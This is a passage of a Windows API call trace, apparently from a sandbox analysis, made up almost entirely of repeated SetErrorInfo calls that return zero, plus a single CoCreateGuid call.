[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.616] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.617] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.620] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.620] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.620] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.620] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.620] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.621] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.622] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.623] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.624] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.625] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.626] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.808] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.808] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.808] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.813] CoCreateGuid (in: pguid=0x12d688 | out: pguid=0x12d688*(Data1=0xa1257e8a, Data2=0xde93, Data3=0x4b3a, Data4=([0]=0xaa, [1]=0xde, [2]=0x88, [3]=0xdb, [4]=0x2a, [5]=0xcc, [6]=0x1f, [7]=0x6e))) returned 0x0
[0061.813] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.813] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.865] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.867] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.873] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.873] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.873] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.874] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.874] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.874] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.874] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.876] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.879] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.881] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
